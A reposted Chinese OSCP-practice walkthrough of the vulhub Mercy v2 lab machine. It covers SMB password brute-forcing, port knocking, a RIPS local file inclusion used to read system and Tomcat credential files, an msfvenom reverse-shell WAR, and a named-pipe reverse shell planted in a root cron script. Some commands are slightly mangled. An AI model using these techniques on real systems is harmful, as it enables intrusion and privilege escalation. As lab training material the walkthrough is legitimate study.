文章详情

短信预约-IT技能 免费直播动态提醒

请输入下面的图形验证码

提交验证

短信预约提醒成功

OSCP练习:vulhub靶机DIGITALWORLD.LOCAL: MERCY v2

2023-09-24 16:45

关注

nmap扫下端口
nmap -sS -sV 192.168.8.144
发现22、80是关的,应该需要敲门
在这里插入图片描述

8080是tomcat页面,但是manager没密码控制台进不去,
提示主机管理器 Web 应用仅限于角色为“admin-gui”的用户。用户在中定义。/etc/tomcat7/tomcat-users.xml
在这里插入图片描述

web暂时没发现线索,尝试攻击Samba
smbclient -NL 192.168.8.144 看一下共享名,发现存在qiu用户
在这里插入图片描述

爆破qiu的密码
hydra -l qiu -P /usr/share/wordlists/fasttrack.txt -e nsr smb://192.168.8.144
发现 密码为password
smbclient \\192.168.8.144\qiu -U qiu
在这里插入图片描述

发现config文件,get到本地

在这里插入图片描述

查看config中的配置,发现开80端口需要敲157、27391、4端口 。开20端口要敲17301、28504、9999

在这里插入图片描述

knock 192.168.8.144 159 27391 4 17301 28504 9999 用knock进行敲门打开80和22
在这里插入图片描述

在这里插入图片描述

dirb爆一下目录,发现robots文件得到mercy、nomercy两个目录

在这里插入图片描述

nomercy目录下是rips0.53的页面
在这里插入图片描述

再exploit-db里搜素rips0.53漏洞,发现存在本地文件包含漏洞
https://www.exploit-db.com/exploits/18660
在这里插入图片描述

成功包含passed
http://192.168.8.144/nomercy/windows/code.php?file=…/…/…/…/…/…/etc/passwd
在这里插入图片描述

尝试包含一开始获取到的/tomcat-users.xml
http://192.168.8.144/nomercy/windows/code.php?file=…/…/…/…/…/…/etc/tomcat7/tomcat-users.xml
在这里插入图片描述

username=“thisisasuperduperlonguser” password="heartbreakisinevitable"成功登录tomcat控制台
在这里插入图片描述

上传个jsp马,需要提前打个war包,也可用msf生成一个
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.8.130 LPORT=7777 -f war -o shell.war

在这里插入图片描述

成功上传
在这里插入图片描述

tnmedxmp.jsp
监听端口
在这里插入图片描述

python生成交互shell:python -c ‘import pty;pty.spawn(“/bin/bash”)’
尝试su到fluffy用户
username=“fluffy” password=“freakishfluffybunny”
在/home/fluffy/.private/secrets下发现timeclock权限为777
在这里插入图片描述

发现可以同步时间,推测应该会周期执行
在这里插入图片描述

直接写个反弹shell进去,等一小会
echo “rm -rf /tmp/p; mknod /tmp/p p; /bin/sh 0/tmp/p” >>timeclock
在这里插入图片描述

root用户确实有timeclock的定时任务
在这里插入图片描述

来源地址:https://blog.csdn.net/weixin_47311099/article/details/127867461

阅读原文内容投诉

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

软考中级精品资料免费领

  • 历年真题答案解析
  • 备考技巧名师总结
  • 高频考点精准押题
  • 2024年上半年信息系统项目管理师第二批次真题及答案解析(完整版)

    难度     813人已做
    查看
  • 【考后总结】2024年5月26日信息系统项目管理师第2批次考情分析

    难度     354人已做
    查看
  • 【考后总结】2024年5月25日信息系统项目管理师第1批次考情分析

    难度     318人已做
    查看
  • 2024年上半年软考高项第一、二批次真题考点汇总(完整版)

    难度     435人已做
    查看
  • 2024年上半年系统架构设计师考试综合知识真题

    难度     224人已做
    查看

相关文章

发现更多好内容

猜你喜欢

AI推送时光机
位置:首页-资讯-后端开发
咦!没有更多了?去看看其它编程学习网 内容吧
首页课程
资料下载
问答资讯